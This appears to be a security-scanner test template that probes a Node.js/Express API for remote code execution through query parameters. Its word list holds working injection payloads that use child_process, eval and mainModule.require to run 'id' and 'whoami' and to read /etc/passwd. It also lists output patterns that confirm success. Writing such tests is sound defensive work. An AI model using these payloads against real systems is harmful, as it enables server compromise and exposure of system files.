---
id: FRAMEWORK_RCE_NODEJS_QUERY
info:
  name: "Framework RCE - Node.js (Query Parameter)"
  description: "Tests whether Node.js applications are vulnerable to Remote Code Execution through query parameter injection. Enabled for gl_elevate where Node.js/Express is the primary framework."
  details: "This test injects Node.js code execution payloads into query parameters to check if the application executes them, indicating a Remote Code Execution vulnerability. Configured for gl_elevate API which uses Node.js/Express as the primary framework."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_NODEJS_QUERY
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  or:
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys

wordLists:
  # Node.js RCE payloads
  nodejsPayloads:
    - "require('child_process').exec('id')"
    - "require('child_process').exec('cat /etc/passwd')"
    - "require('child_process').exec('whoami')"
    - "require('child_process').execSync('id')"
    - "require('child_process').execSync('cat /etc/passwd')"
    - "require('child_process').spawn('id')"
    - "require('child_process').spawn('cat', ['/etc/passwd'])"
    - "eval('require(\"child_process\").exec(\"id\")')"
    - "eval('require(\"child_process\").exec(\"cat /etc/passwd\")')"
    - "global.process.mainModule.require('child_process').exec('id')"
    - "global.process.mainModule.require('child_process').exec('cat /etc/passwd')"
    - "process.mainModule.require('child_process').exec('id')"
    - "process.mainModule.require('child_process').exec('cat /etc/passwd')"
    - "Function('return process')().mainModule.require('child_process').exec('id')"
    - "Function('return process')().mainModule.require('child_process').exec('cat /etc/passwd')"
    - "const { exec } = require('child_process');exec('ls -la', (error, stdout, stderr) => { console.log(stdout);});"
    - "const fs = require('fs');const data = fs.readFileSync('/etc/passwd', 'utf8');console.log(data);"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"
    - "const { exec }"
    - "child_process"

execute:
  type: single
  requests:
    - req:
        - modify_method: GET
        - for_each_combination: true
        - modify_query_param:
            ${queryKeys}: "${nodejsPayloads}"
        - replace_body: '{}'

validate:
  response_code:
    eq: 200
  response_payload:
    regex: 'root:.*:0:0:'
    contains_either: "${rceOutcomes}"
